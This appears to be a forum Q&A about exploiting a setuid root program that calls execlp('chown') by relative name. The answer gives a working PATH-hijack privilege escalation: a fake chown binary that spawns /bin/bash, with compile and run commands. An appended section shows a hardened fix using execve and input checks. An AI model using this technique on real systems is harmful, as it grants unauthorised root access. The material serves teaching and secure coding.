Can I get root access to a system that is using a setuid root binary?

Asked by AndreaBailey in Cyber Security, asked on Mar 14, 2022

 Assuming that I have no ability to use sudo and rather limited permissions, but I have a shell script exploit that allows me to change the file ownership of a file to the current user by running a buggy program written in C that has root permissions. Specifically, the execlp() function is what is being exploited as I have already found a way to specify the file parameter. The user variable is received by a call to the getenv() function.


execlp("chown", user, file, (char *)0);

How would I exploit this ability to gain ownership of any file in the system to ultimately gain sudo access over the system? What files would I modify?


I've tried modifying the /etc/sudoers file itself, but it would give the following errors:

sudo: no valid sudoers sources found, quitting
sudo: /etc/sudoers is owned by uid 1000, should be 0

Note that I can't change the file's owner back to root as the current user does not have permission to chown the file to root. I am operating on a dummy VM right now and this is just a security exercise.

Answered by Ankesh Kumar

execlp does not have an absolute path for chown here, so you should be able to manipulate the Linux PATH variable and get arbitrary code execution. In order to do this, write a simple C program which calls the system shell, like:


#include <stdlib.h>  /* declares system() */
int main(void){
    system("/bin/bash");  /* start a shell */
    return 0;
}

Save this file and compile this program using cc program.c -o chown, and set execution privilege on it using chmod +x chown. Once this is done, run the vulnerable binary from the path of the evil chown binary like: PATH=. /path/to/vulnerable/c/program. Your C program will now call our custom chown binary as root and drop you into a setuid root bash shell.
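The fix for the PATH lookup described in the answer above, shown as an added example that is not part of the original question or answer: the helper is executed by absolute path with a fixed argument vector and a fixed environment. It goes slightly beyond the answer by also validating the environment-supplied user value. CHOWN_PATH, valid_user and run_chown are names assumed for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Assumed install location of the real tool; adjust per distribution. */
#define CHOWN_PATH "/bin/chown"

/* Accept only a conservative account-name/uid alphabet. The value comes from
 * getenv(), so in a setuid program it is controlled by the calling user. */
int valid_user(const char *u)
{
    if (u == NULL || *u == '\0' || *u == '-' || strlen(u) > 32)
        return 0;
    for (; *u; u++)
        if (!isalnum((unsigned char)*u) && *u != '_' && *u != '-')
            return 0;
    return 1;
}

/* Hardened replacement for execlp("chown", user, file, (char *)0).
 * Returns chown's exit status, or -1 if input is rejected or exec fails. */
int run_chown(const char *user, const char *file)
{
    if (!valid_user(user) || file == NULL || file[0] != '/')
        return -1;
    /* Fixed argv; "--" stops option parsing before the untrusted operands. */
    char *const argv[] = { "chown", "--", (char *)user, (char *)file, NULL };
    /* Fixed environment: nothing is inherited from the caller. */
    char *const envp[] = { "PATH=/usr/bin:/bin", "LC_ALL=C", NULL };

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* execve() takes a full path and never searches PATH. */
        execve(CHOWN_PATH, argv, envp);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status) == 127 ? -1 : WEXITSTATUS(status);
}
```

Where the program only needs to change ownership, calling the chown(2) system call directly avoids running an external helper at all.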


